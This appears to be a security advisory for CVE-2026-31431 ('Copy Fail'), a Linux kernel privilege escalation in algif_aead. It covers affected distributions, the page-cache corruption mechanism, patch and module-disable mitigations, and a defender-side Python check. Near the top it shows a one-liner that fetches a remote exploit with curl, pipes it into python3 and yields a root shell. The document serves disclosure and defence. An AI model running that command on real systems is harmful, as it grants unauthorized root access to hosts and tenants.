Copy Fail: Critical Linux Kernel Exploit CVE-2026-31431
Discover Copy Fail, a devastating Linux kernel vulnerability (CVE-2026-31431) affecting kernels from 2017-2026. A tiny 732-byte Python script grants unprivileged users root access across Ubuntu, RHEL, SUSE, and more. Bypassing page cache protections, it corrupts setuid binaries silently without disk writes. Learn who’s affected, immediate mitigations, and why this portable LPE outclasses Dirty Pipe and Dirty Cow. Patch now for multi-tenant servers, Kubernetes, and CI runners.
Copy Fail: The Silent Linux Kernel Killer (CVE-2026-31431)
A single 732-byte Python script. Four major Linux distributions. Four root shells — no modifications, no recompilation, no fuss. Welcome to Copy Fail (CVE-2026-31431), the most portable local privilege escalation in recent Linux history.
The Exploit That Works Everywhere
Discovered through AI-assisted auditing by Xint Code, Copy Fail exploits a 2017 kernel optimization in the algif_aead crypto interface. Unprivileged users can write 4 controlled bytes directly into the page cache of any readable file — including setuid-root binaries like /usr/bin/su.
```console
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
```
One take. 100% reliable. Every distro.
Who Needs to Panic (Patch Order)
| Priority | Environment | Risk |
|---|---|---|
| 🟥 High | Multi-tenant hosts, Kubernetes, CI runners | Any user → host root |
| 🟥 High | Cloud SaaS, notebook hosts | Tenant escape to host |
| 🟨 Medium | Single-tenant servers | Internal LPE chain |
| 🟢 Lower | Single-user workstations | Post-exploitation only |
Verified affected: Ubuntu 24.04, Amazon Linux 2023, RHEL 10, SUSE 16 (and counting).
What Makes Copy Fail Different
| Property | Typical LPE | Copy Fail |
|---|---|---|
| Race condition | ✅ Required | ❌ None |
| Per-distro offsets | ✅ Required | ❌ Universal |
| Reliability | 30-80% | ✅ 100% single-shot |
| Affected window | Narrow range | 2017 → 2026 (9 years) |
| Container escape | ❌ Host-only | ✅ Cross-tenant |
Unlike Dirty Pipe (pipe flags) or Dirty Cow (race conditions), Copy Fail is straight-line code abusing AEAD scatterlist mishandling.
Immediate Mitigation
1. Patch (Primary)
```bash
# Update kernel to include mainline commit a664bf3d603d
apt update && apt upgrade linux-image-generic # Ubuntu
yum update kernel # RHEL
zypper update kernel # SUSE
```
2. Emergency Disable (Pre-patch)
```bash
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
```
Performance impact: none for 99.9% of workloads. Only the rare workloads that use AF_ALG are affected.
3. Container Hardening
Block AF_ALG sockets via seccomp for untrusted workloads.
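To verify that step 2 actually took effect, and to catch the cases where it cannot (a `blacklist`-only line, or a kernel with algif_aead built in), here is an added defender-side check in Python; it is not code from the advisory, and the `/etc/modprobe.d` scan and the `gcm(aes)` bind target are assumptions of this example.

```python
"""Check whether the CVE-2026-31431 emergency mitigation (disabling algif_aead)
is actually in effect. Added defender-side example, not the advisory's code."""
import glob
import os
import socket

# Directives that make modprobe refuse to load the module. A plain 'blacklist'
# line is NOT enough: it only suppresses alias-based autoload, while the kernel's
# request_module() asks for algif_aead by name when a socket binds to "aead".
_HARD_DISABLE = ("/bin/false", "/bin/true")


def modprobe_disables(conf_text: str, module: str = "algif_aead") -> bool:
    """True if conf_text carries an 'install <module> /bin/false|/bin/true' rule."""
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and padding
        parts = line.split()
        if (len(parts) >= 3 and parts[0] == "install"
                and parts[1] == module and parts[2] in _HARD_DISABLE):
            return True
    return False


def modprobe_dir_disables(directory: str = "/etc/modprobe.d") -> bool:
    """Scan every *.conf in the modprobe directory (assumed path) for a rule."""
    for path in sorted(glob.glob(os.path.join(directory, "*.conf"))):
        with open(path, encoding="utf-8", errors="replace") as fh:
            if modprobe_disables(fh.read()):
                return True
    return False


def algif_aead_bindable():
    """Live check: can this process reach the AEAD type of AF_ALG at all?
    Returns True/False, or None where the platform has no AF_ALG (non-Linux).
    The bind triggers kernel module autoload, so a bare 'rmmod' without the
    install rule is undone by it; that is exactly the gap this exposes."""
    if not hasattr(socket, "AF_ALG"):
        return None
    try:
        with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as s:
            s.bind(("aead", "gcm(aes)"))  # any common AEAD; nothing is encrypted
        return True
    except OSError:
        return False  # typically ENOENT: algif_aead refused to load


if __name__ == "__main__":
    rule, live = modprobe_dir_disables(), algif_aead_bindable()
    print(f"install rule present: {rule}\nAEAD socket bindable: {live}")
    # Bindable despite the rule means built-in (=y) or already loaded: patch.
    raise SystemExit(1 if live else 0)
```

A non-zero exit means the AEAD interface is still reachable and only the kernel patch closes the hole.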
Technical Deep Dive
The vulnerability lives in algif_aead (AF_ALG socket family). A 2017 'optimization' allowed in-place crypto where page-cache pages (read-only source) became the writable destination scatterlist.
- splice() feeds page-cache pages into the crypto scatterlist
- AEAD authentication scribbles 4 AAD ESN bytes past the buffer bounds
- authenc_esn never restores the overwritten page-cache bytes
- execve(/usr/bin/su) reads the corrupted page cache → root shell
Stealth bonus: No VFS writes, no dirty pages, no disk changes. Evict cache or reboot → clean file.
Disclosure Timeline
- 2026-03-23: Reported to kernel team
- 2026-04-01: Patch committed
- 2026-04-29: Public disclosure
Defend Responsibly
The PoC is public (sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9) for defenders to test patches. Only run on authorized systems.
Multi-tenant operators: Patch yesterday. This isn't theoretical.
Found by Xint Code — AI security auditing that actually works.